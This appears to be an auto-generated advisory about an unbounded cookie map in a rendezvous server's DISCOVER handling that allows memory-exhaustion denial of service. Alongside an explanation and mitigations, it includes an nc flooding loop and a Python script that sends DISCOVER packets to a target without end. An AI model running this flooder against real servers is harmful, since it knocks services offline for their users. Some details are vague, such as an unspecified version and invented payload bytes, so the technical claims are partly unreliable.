Listen to this Post
How the CVE works:
The vulnerability exists in the rendezvous server’s pagination cookie storage.
The server maintains a `HashMap
When an unauthenticated peer sends a `DISCOVER` message, the `handle_request` function processes it.
The server calls `registrations.get(…)` to check for existing cookies, but if none exist, it generates a new random cookie.
This new cookie is inserted into the `Registrations::cookies` map without any size limits.
Critically, there is no eviction policy, upper bound, or expiration mechanism for these cookies.
An attacker can simply repeat the `DISCOVER` request thousands or millions of times.
Each request forces the server to allocate a new `Cookie` and a new `HashSet
Over time, the map grows linearly with the number of requests.
The server memory is consumed indefinitely until exhaustion.
No authentication is required, and the traffic is protocol-compliant, making it undetectable as an attack.
The attack complexity is low – only sending repeated valid `DISCOVER` packets.
The impact is a denial-of-service via remote state amplification.
Rendezvous nodes exposed to untrusted peers are vulnerable.
The issue was identified in the pagination logic of the rendezvous protocol implementation.
A proof-of-concept harness can reproduce the unbounded growth within minutes.
Fix options include global caps with FIFO eviction, stateless authenticated cookies, or per-peer rate limiting.
dailycve form:
Platform: Rendezvous server
Version: Unspecified
Vulnerability: Unbounded memory growth
Severity: Critical
date: 2026-04-05
Prediction: 2026-05-15
What Undercode Say:
Analytics:
Simulate unbounded cookie growth
for i in {1..100000}; do
echo "DISCOVER" | nc -u rendezvous.example.com 1234
done
Monitor memory usage of rendezvous process
watch -n 1 'ps aux | grep rendezvous | awk "{print \$6}"'
Check current cookie map size via debug endpoint (if exposed)
curl http://rendezvous.local/debug/cookies | jq '.cookies | length'
Exploit:
import socket
import random
target = ("192.168.1.100", 1234)
payload = b"\x01\x02\x03\x04DISCOVER" protocol-compliant
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, target)
sock.close()
Protection from this CVE:
- Apply upstream patch limiting `MAX_COOKIES_TRACKED` to 1000 with FIFO eviction.
- Enable per-peer rate limiting for `DISCOVER` requests (e.g., 10/minute).
- Switch to stateless authenticated cookies (HMAC-encoded pagination state).
- Deploy memory monitoring and auto-restart thresholds.
Impact:
Remote memory exhaustion leading to crash of rendezvous node.
Affects all peers relying on the server for discovery.
No data corruption, but complete denial of service.
Attack can be sustained from a single low-bandwidth source.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

